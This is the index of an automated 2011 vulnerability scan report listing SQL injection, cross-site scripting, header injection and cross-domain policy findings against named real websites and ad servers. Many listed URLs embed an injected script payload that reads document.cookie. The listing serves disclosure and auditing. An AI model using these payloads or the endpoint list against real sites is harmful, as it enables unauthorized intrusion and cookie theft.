XSS, Cross Site Scripting, Content Type Incorrectly Stated, CWE-79

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Report generated by XSS.CX at Wed Mar 23 15:41:02 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler

Loading

1. SQL injection

1.1. http://ad.doubleclick.net/adi/N3671.tribe.net/B5229711.4 [name of an arbitrarily supplied request parameter]

1.2. http://ad.doubleclick.net/adi/N5621.66.2412875475321/B4682155 [sz parameter]

1.3. https://store.port80software.com/cart/ [User-Agent HTTP header]

1.4. http://www.port80software.com/ [Referer HTTP header]

1.5. http://www.port80software.com/products/linkdeny/ [__utmc cookie]

1.6. http://www.port80software.com/products/serverdefender/ [Referer HTTP header]

1.7. https://www.port80software.com/images/N_support.gif [User-Agent HTTP header]

2. Cross-site scripting (stored)

2.1. http://order.1and1.com/xml/order/CloudDynamicServer [REST URL parameter 3]

2.2. http://order.1and1.com/xml/order/DomaininfoMove [REST URL parameter 3]

2.3. http://order.1and1.com/xml/order/Eshops [REST URL parameter 3]

2.4. http://order.1and1.com/xml/order/FeatureDatabaseDatabase [REST URL parameter 3]

2.5. http://order.1and1.com/xml/order/FeatureEmailEmail [REST URL parameter 3]

2.6. http://order.1and1.com/xml/order/FeatureEmailWebmail [REST URL parameter 3]

2.7. http://order.1and1.com/xml/order/FeatureGuaranteeMoneyback [REST URL parameter 3]

2.8. http://order.1and1.com/xml/order/FeatureMarketingCtrCitysearch [REST URL parameter 3]

2.9. http://order.1and1.com/xml/order/FeatureMarketingCtrStat [REST URL parameter 3]

2.10. http://order.1and1.com/xml/order/FeatureSite-buildingCgi [REST URL parameter 3]

2.11. http://order.1and1.com/xml/order/FeatureSite-buildingDsc [REST URL parameter 3]

2.12. http://order.1and1.com/xml/order/FeatureSite-buildingElements [REST URL parameter 3]

2.13. http://order.1and1.com/xml/order/FeatureSite-buildingPhotogallery [REST URL parameter 3]

2.14. http://order.1and1.com/xml/order/FeatureSite-buildingWsb [REST URL parameter 3]

2.15. http://order.1and1.com/xml/order/Gtc [REST URL parameter 3]

2.16. http://order.1and1.com/xml/order/Home [REST URL parameter 3]

2.17. http://order.1and1.com/xml/order/Hosting [REST URL parameter 3]

2.18. http://order.1and1.com/xml/order/Hosting [REST URL parameter 3]

2.19. http://order.1and1.com/xml/order/Hosting [REST URL parameter 3]

2.20. http://order.1and1.com/xml/order/Instant [REST URL parameter 3]

2.21. http://order.1and1.com/xml/order/MailInstantMail [REST URL parameter 3]

2.22. http://order.1and1.com/xml/order/MsHosting [REST URL parameter 3]

2.23. http://order.1and1.com/xml/order/Service [REST URL parameter 3]

2.24. http://order.1and1.com/xml/order/Sharepoint [REST URL parameter 3]

2.25. http://order.1and1.com/xml/order/VirtualServerL [REST URL parameter 3]

2.26. http://order.1and1.com/xml/order/popupDomainPrices [REST URL parameter 3]

3. HTTP header injection

3.1. http://ad.doubleclick.net/adi/N5315.150143.0288179548321/B5334493.21 [REST URL parameter 1]

3.2. http://ad.doubleclick.net/adi/N5621.66.2412875475321/B4682155 [REST URL parameter 1]

3.3. http://ad.doubleclick.net/adj/N5295.150800.VALUECLICK/B5319645.4 [REST URL parameter 1]

3.4. http://d7.zedo.com/bar/v16-403/d3/jsc/fmr.js [$ parameter]

3.5. http://order.1and1.com/xml/order/Jumpto [jsessionid parameter]

3.6. http://order.1and1.com/xml/order/Jumpto [linkId parameter]

3.7. http://order.1and1.com/xml/order/Jumpto [linkOrigin parameter]

3.8. http://order.1and1.com/xml/order/Jumpto [name of an arbitrarily supplied request parameter]

3.9. http://order.1and1.com/xml/order/Jumpto [origin.page parameter]

3.10. http://order.1and1.com/xml/order/Jumpto [page parameter]

3.11. http://order.1and1.com/xml/order/Jumpto [site parameter]

3.12. http://order.1and1.com/xml/order/Jumpto [sourcearea parameter]

3.13. http://order.1and1.com/xml/order/domaincheck [__lf parameter]

3.14. http://order.1and1.com/xml/order/domaincheck [jsessionid parameter]

3.15. http://order.1and1.com/xml/order/tariffselect [__lf parameter]

3.16. http://order.1and1.com/xml/order/tariffselect [jsessionid parameter]

3.17. http://wa.ui-portal.de/webde/webde-s/s [REST URL parameter 3]

4. Cross-site scripting (reflected)

4.1. http://ad.adtegrity.net/st [name of an arbitrarily supplied request parameter]

4.2. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.43 [adurl parameter]

4.3. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.43 [ai parameter]

4.4. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.43 [client parameter]

4.5. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.43 [num parameter]

4.6. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.43 [sig parameter]

4.7. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.43 [sz parameter]

4.8. http://ad.doubleclick.net/adi/N5315.150143.0288179548321/B5334493.21 [adurl parameter]

4.9. http://ad.doubleclick.net/adi/N5315.150143.0288179548321/B5334493.21 [ai parameter]

4.10. http://ad.doubleclick.net/adi/N5315.150143.0288179548321/B5334493.21 [client parameter]

4.11. http://ad.doubleclick.net/adi/N5315.150143.0288179548321/B5334493.21 [num parameter]

4.12. http://ad.doubleclick.net/adi/N5315.150143.0288179548321/B5334493.21 [sig parameter]

4.13. http://ad.doubleclick.net/adi/N5315.150143.0288179548321/B5334493.21 [sz parameter]

4.14. http://ad.doubleclick.net/adj/N2998.134236.9345108740621/B5095412.5 [c parameter]

4.15. http://ad.doubleclick.net/adj/N2998.134236.9345108740621/B5095412.5 [c parameter]

4.16. http://ad.doubleclick.net/adj/N2998.134236.9345108740621/B5095412.5 [forced_click parameter]

4.17. http://ad.doubleclick.net/adj/N2998.134236.9345108740621/B5095412.5 [forced_click parameter]

4.18. http://ad.doubleclick.net/adj/N2998.134236.9345108740621/B5095412.5 [m parameter]

4.19. http://ad.doubleclick.net/adj/N2998.134236.9345108740621/B5095412.5 [m parameter]

4.20. http://ad.doubleclick.net/adj/N2998.134236.9345108740621/B5095412.5 [mid parameter]

4.21. http://ad.doubleclick.net/adj/N2998.134236.9345108740621/B5095412.5 [mid parameter]

4.22. http://ad.doubleclick.net/adj/N2998.134236.9345108740621/B5095412.5 [sid parameter]

4.23. http://ad.doubleclick.net/adj/N2998.134236.9345108740621/B5095412.5 [sid parameter]

4.24. http://ad.doubleclick.net/adj/N2998.134236.9345108740621/B5095412.5 [sz parameter]

4.25. http://ad.doubleclick.net/adj/N2998.134236.9345108740621/B5095412.5 [sz parameter]

4.26. http://ad.doubleclick.net/adj/N2998.134236.9345108740621/B5095412.5 [tp parameter]

4.27. http://ad.doubleclick.net/adj/N2998.134236.9345108740621/B5095412.5 [tp parameter]

4.28. http://ad.doubleclick.net/adj/N5295.150800.VALUECLICK/B5319645.4 [c parameter]

4.29. http://ad.doubleclick.net/adj/N5295.150800.VALUECLICK/B5319645.4 [c parameter]

4.30. http://ad.doubleclick.net/adj/N5295.150800.VALUECLICK/B5319645.4 [forced_click parameter]

4.31. http://ad.doubleclick.net/adj/N5295.150800.VALUECLICK/B5319645.4 [forced_click parameter]

4.32. http://ad.doubleclick.net/adj/N5295.150800.VALUECLICK/B5319645.4 [m parameter]

4.33. http://ad.doubleclick.net/adj/N5295.150800.VALUECLICK/B5319645.4 [m parameter]

4.34. http://ad.doubleclick.net/adj/N5295.150800.VALUECLICK/B5319645.4 [mid parameter]

4.35. http://ad.doubleclick.net/adj/N5295.150800.VALUECLICK/B5319645.4 [mid parameter]

4.36. http://ad.doubleclick.net/adj/N5295.150800.VALUECLICK/B5319645.4 [sid parameter]

4.37. http://ad.doubleclick.net/adj/N5295.150800.VALUECLICK/B5319645.4 [sid parameter]

4.38. http://ad.doubleclick.net/adj/N5295.150800.VALUECLICK/B5319645.4 [sz parameter]

4.39. http://ad.doubleclick.net/adj/N5295.150800.VALUECLICK/B5319645.4 [sz parameter]

4.40. http://ad.doubleclick.net/adj/N5295.150800.VALUECLICK/B5319645.4 [tp parameter]

4.41. http://ad.doubleclick.net/adj/N5295.150800.VALUECLICK/B5319645.4 [tp parameter]

4.42. http://ad.doubleclick.net/adj/N5554.acerno.com/B5224009.7 [click parameter]

4.43. http://ad.technoratimedia.com/st [name of an arbitrarily supplied request parameter]

4.44. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]

4.45. http://ads.adxpose.com/ads/ads.js [uid parameter]

4.46. http://ads.newtention.net/ads [et parameter]

4.47. http://ads.newtention.net/ads [rt parameter]

4.48. http://ads.newtention.net/ads [se parameter]

4.49. http://adsfac.us/ag.asp [cc parameter]

4.50. http://assets.truvie.com/button.js [partner_key parameter]

4.51. http://assets.truvie.com/button.js [token parameter]

4.52. http://b.scorecardresearch.com/beacon.js [c1 parameter]

4.53. http://b.scorecardresearch.com/beacon.js [c2 parameter]

4.54. http://b.scorecardresearch.com/beacon.js [c3 parameter]

4.55. http://b.scorecardresearch.com/beacon.js [c4 parameter]

4.56. http://b.scorecardresearch.com/beacon.js [c5 parameter]

4.57. http://b.scorecardresearch.com/beacon.js [c6 parameter]

4.58. http://d7.zedo.com/bar/v16-403/d3/jsc/fm.js [$ parameter]

4.59. http://d7.zedo.com/bar/v16-403/d3/jsc/fm.js [$ parameter]

4.60. http://d7.zedo.com/bar/v16-403/d3/jsc/fm.js [q parameter]

4.61. http://d7.zedo.com/bar/v16-403/d3/jsc/fm.js [q parameter]

4.62. http://d7.zedo.com/bar/v16-403/d3/jsc/fmr.js [$ parameter]

4.63. http://d7.zedo.com/bar/v16-403/d3/jsc/fmr.js [$ parameter]

4.64. http://d7.zedo.com/bar/v16-403/d3/jsc/fmr.js [q parameter]

4.65. http://d7.zedo.com/bar/v16-403/d3/jsc/fmr.js [q parameter]

4.66. http://ds.addthis.com/red/psi/sites/seo101.co/p.json [callback parameter]

4.67. http://event.adxpose.com/event.flow [uid parameter]

4.68. http://img.mediaplex.com/content/0/707/52222/44909_GEN09Products1_ebay_300x250.html [mpck parameter]

4.69. http://img.mediaplex.com/content/0/707/52222/44909_GEN09Products1_ebay_300x250.html [mpvc parameter]

4.70. http://imp.fetchback.com/serve/fb/adtag.js [clicktrack parameter]

4.71. http://imp.fetchback.com/serve/fb/adtag.js [name of an arbitrarily supplied request parameter]

4.72. http://imp.fetchback.com/serve/fb/adtag.js [tid parameter]

4.73. http://imp.fetchback.com/serve/fb/adtag.js [type parameter]

4.74. http://kona40.kontera.com/KonaGet.js [l parameter]

4.75. http://kona40.kontera.com/KonaGet.js [rId parameter]

4.76. http://kona5.kontera.com/KonaGet.js [l parameter]

4.77. http://kona5.kontera.com/KonaGet.js [rId parameter]

4.78. http://mm.chitika.net/minimall [callback parameter]

4.79. http://ol5u8o2ka38be34j62ktnefji390jhro-a-fc-opensocial.googleusercontent.com/gadgets/ifr [url parameter]

4.80. http://pagerank.techie-buzz.com/pagerankfetcher.php [url parameter]

4.81. http://pubads.g.doubleclick.net/gampad/ads [page_slots parameter]

4.82. http://pubads.g.doubleclick.net/gampad/ads [slotname parameter]

4.83. http://r1rk9np7bpcsfoeekl0khkd2juj27q3o-a-fc-opensocial.googleusercontent.com/gadgets/ifr [url parameter]

4.84. http://s46.sitemeter.com/js/counter.asp [site parameter]

4.85. http://s46.sitemeter.com/js/counter.js [site parameter]

4.86. http://seo101.co/xss.cx [REST URL parameter 1]

4.87. http://seo101.co/xss.cx [REST URL parameter 1]

4.88. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/css/default.css [REST URL parameter 1]

4.89. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/css/default.css [REST URL parameter 1]

4.90. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/css/default.css [REST URL parameter 1]

4.91. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/css/default.css [REST URL parameter 2]

4.92. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/css/default.css [REST URL parameter 2]

4.93. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/css/default.css [REST URL parameter 2]

4.94. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/css/default.css [REST URL parameter 3]

4.95. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/css/default.css [REST URL parameter 3]

4.96. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/css/default.css [REST URL parameter 4]

4.97. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/css/default.css [REST URL parameter 4]

4.98. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/favicon.ico [REST URL parameter 1]

4.99. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/favicon.ico [REST URL parameter 1]

4.100. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/favicon.ico [REST URL parameter 1]

4.101. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/favicon.ico [REST URL parameter 2]

4.102. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/favicon.ico [REST URL parameter 2]

4.103. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/favicon.ico [REST URL parameter 2]

4.104. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/favicon.ico [REST URL parameter 3]

4.105. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/favicon.ico [REST URL parameter 3]

4.106. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/favicon.ico [REST URL parameter 4]

4.107. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/favicon.ico [REST URL parameter 4]

4.108. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/logo.png [REST URL parameter 1]

4.109. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/logo.png [REST URL parameter 1]

4.110. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/logo.png [REST URL parameter 1]

4.111. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/logo.png [REST URL parameter 2]

4.112. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/logo.png [REST URL parameter 2]

4.113. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/logo.png [REST URL parameter 2]

4.114. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/logo.png [REST URL parameter 3]

4.115. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/logo.png [REST URL parameter 3]

4.116. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/logo.png [REST URL parameter 4]

4.117. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/logo.png [REST URL parameter 4]

4.118. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/pr/1/pr5.gif [REST URL parameter 1]

4.119. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/pr/1/pr5.gif [REST URL parameter 1]

4.120. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/pr/1/pr5.gif [REST URL parameter 1]

4.121. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/pr/1/pr5.gif [REST URL parameter 2]

4.122. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/pr/1/pr5.gif [REST URL parameter 2]

4.123. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/pr/1/pr5.gif [REST URL parameter 2]

4.124. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/pr/1/pr5.gif [REST URL parameter 3]

4.125. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/pr/1/pr5.gif [REST URL parameter 3]

4.126. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/pr/1/pr5.gif [REST URL parameter 4]

4.127. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/pr/1/pr5.gif [REST URL parameter 4]

4.128. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/pr/1/pr5.gif [REST URL parameter 5]

4.129. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/pr/1/pr5.gif [REST URL parameter 5]

4.130. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/pr/1/pr5.gif [REST URL parameter 6]

4.131. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/pr/1/pr5.gif [REST URL parameter 6]

4.132. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/today.png [REST URL parameter 1]

4.133. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/today.png [REST URL parameter 1]

4.134. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/today.png [REST URL parameter 1]

4.135. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/today.png [REST URL parameter 2]

4.136. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/today.png [REST URL parameter 2]

4.137. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/today.png [REST URL parameter 2]

4.138. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/today.png [REST URL parameter 3]

4.139. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/today.png [REST URL parameter 3]

4.140. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/today.png [REST URL parameter 4]

4.141. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/today.png [REST URL parameter 4]

4.142. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/total.png [REST URL parameter 1]

4.143. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/total.png [REST URL parameter 1]

4.144. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/total.png [REST URL parameter 1]

4.145. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/total.png [REST URL parameter 2]

4.146. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/total.png [REST URL parameter 2]

4.147. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/total.png [REST URL parameter 2]

4.148. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/total.png [REST URL parameter 3]

4.149. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/total.png [REST URL parameter 3]

4.150. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/total.png [REST URL parameter 4]

4.151. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/total.png [REST URL parameter 4]

4.152. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/xml-sitemap.jpeg [REST URL parameter 1]

4.153. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/xml-sitemap.jpeg [REST URL parameter 1]

4.154. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/xml-sitemap.jpeg [REST URL parameter 1]

4.155. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/xml-sitemap.jpeg [REST URL parameter 2]

4.156. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/xml-sitemap.jpeg [REST URL parameter 2]

4.157. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/xml-sitemap.jpeg [REST URL parameter 2]

4.158. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/xml-sitemap.jpeg [REST URL parameter 3]

4.159. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/xml-sitemap.jpeg [REST URL parameter 3]

4.160. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/xml-sitemap.jpeg [REST URL parameter 4]

4.161. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/xml-sitemap.jpeg [REST URL parameter 4]

4.162. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/js/jquery.js [REST URL parameter 1]

4.163. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/js/jquery.js [REST URL parameter 1]

4.164. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/js/jquery.js [REST URL parameter 1]

4.165. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/js/jquery.js [REST URL parameter 2]

4.166. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/js/jquery.js [REST URL parameter 2]

4.167. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/js/jquery.js [REST URL parameter 2]

4.168. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/js/jquery.js [REST URL parameter 3]

4.169. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/js/jquery.js [REST URL parameter 3]

4.170. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/js/jquery.js [REST URL parameter 4]

4.171. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/js/jquery.js [REST URL parameter 4]

4.172. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/js/scripts.js [REST URL parameter 1]

4.173. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/js/scripts.js [REST URL parameter 1]

4.174. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/js/scripts.js [REST URL parameter 1]

4.175. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/js/scripts.js [REST URL parameter 2]

4.176. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/js/scripts.js [REST URL parameter 2]

4.177. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/js/scripts.js [REST URL parameter 2]

4.178. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/js/scripts.js [REST URL parameter 3]

4.179. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/js/scripts.js [REST URL parameter 3]

4.180. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/js/scripts.js [REST URL parameter 4]

4.181. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/js/scripts.js [REST URL parameter 4]

4.182. http://shots.snap.com/snap_shots.js [key parameter]

4.183. http://shots.snap.com/snap_shots.js [preview_trigger parameter]

4.184. http://techie-buzz.com/ [name of an arbitrarily supplied request parameter]

4.185. http://www.alexa.com/cgi-bin/ispionage.php [url parameter]

4.186. http://www.linkedin.com/company/api/recommendation/count [callback parameter]

4.187. http://www.pixazza.com/ad-impression/2540be4033/517da02c02/4f29944804/ [callback parameter]

4.188. http://www.pixazza.com/metadata/ [callback parameter]

4.189. http://www.pixazza.com/metadata/ [url parameter]

4.190. http://www.port80software.com/ [name of an arbitrarily supplied request parameter]

4.191. https://www.port80software.com/css/dom_style.css [name of an arbitrarily supplied request parameter]

4.192. https://www.port80software.com/images/H_logo.gif [name of an arbitrarily supplied request parameter]

4.193. https://www.port80software.com/images/NR_about.gif [name of an arbitrarily supplied request parameter]

4.194. https://www.port80software.com/images/NR_products.gif [name of an arbitrarily supplied request parameter]

4.195. https://www.port80software.com/images/NR_support.gif [name of an arbitrarily supplied request parameter]

4.196. https://www.port80software.com/images/N_about.gif [name of an arbitrarily supplied request parameter]

4.197. https://www.port80software.com/images/N_contact.gif [name of an arbitrarily supplied request parameter]

4.198. https://www.port80software.com/images/N_products.gif [name of an arbitrarily supplied request parameter]

4.199. https://www.port80software.com/images/N_support.gif [name of an arbitrarily supplied request parameter]

4.200. https://www.port80software.com/images/SH_myport80.gif [name of an arbitrarily supplied request parameter]

4.201. https://www.port80software.com/images/TN_signup.gif [name of an arbitrarily supplied request parameter]

4.202. https://www.port80software.com/images/cart.gif [name of an arbitrarily supplied request parameter]

4.203. https://www.port80software.com/images/cartR.gif [name of an arbitrarily supplied request parameter]

4.204. https://www.port80software.com/images/signup.gif [name of an arbitrarily supplied request parameter]

4.205. https://www.port80software.com/images/signupR.gif [name of an arbitrarily supplied request parameter]

4.206. https://www.port80software.com/myport80/images/space.gif [name of an arbitrarily supplied request parameter]

4.207. http://www.topwebhosts.org/ [name of an arbitrarily supplied request parameter]

4.208. http://www.topwebhosts.org/showcase/reseller-hosting.php [name of an arbitrarily supplied request parameter]

4.209. http://www.topwebhosts.org/tools/ip-locator.php [name of an arbitrarily supplied request parameter]

4.210. http://www.topwebhosts.org/tools/ip-locator.php [query parameter]

4.211. http://www.topwebhosts.org/tools/ip-locator.php [query parameter]

4.212. http://www.topwebhosts.org/tools/ip-locator.php [query parameter]

4.213. http://www.united-domains.de/ [name of an arbitrarily supplied request parameter]

4.214. http://www.alexa.com/siteinfo/xss.cx [Referer HTTP header]

4.215. http://www.united-internet.de/ [User-Agent HTTP header]

4.216. http://s46.sitemeter.com/js/counter.asp [IP cookie]

4.217. http://s46.sitemeter.com/js/counter.js [IP cookie]

4.218. http://seg.sharethis.com/getSegment.php [__stid cookie]

4.219. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/css/default.css [REST URL parameter 1]

4.220. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/favicon.ico [REST URL parameter 1]

4.221. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/logo.png [REST URL parameter 1]

4.222. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/pr/1/pr5.gif [REST URL parameter 1]

4.223. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/today.png [REST URL parameter 1]

4.224. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/total.png [REST URL parameter 1]

4.225. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/xml-sitemap.jpeg [REST URL parameter 1]

4.226. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/js/jquery.js [REST URL parameter 1]

4.227. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/js/scripts.js [REST URL parameter 1]

5. Flash cross-domain policy

5.1. http://0.gravatar.com/crossdomain.xml

5.2. http://1.gravatar.com/crossdomain.xml

5.3. http://a.tribalfusion.com/crossdomain.xml

5.4. http://as.casalemedia.com/crossdomain.xml

5.5. http://b.scorecardresearch.com/crossdomain.xml

5.6. http://d3.zedo.com/crossdomain.xml

5.7. http://d7.zedo.com/crossdomain.xml

5.8. http://dg.specificclick.net/crossdomain.xml

5.9. http://i.ytimg.com/crossdomain.xml

5.10. http://ib.adnxs.com/crossdomain.xml

5.11. http://log30.doubleverify.com/crossdomain.xml

5.12. http://m1.zedo.com/crossdomain.xml

5.13. http://media.fastclick.net/crossdomain.xml

5.14. http://gdata.youtube.com/crossdomain.xml

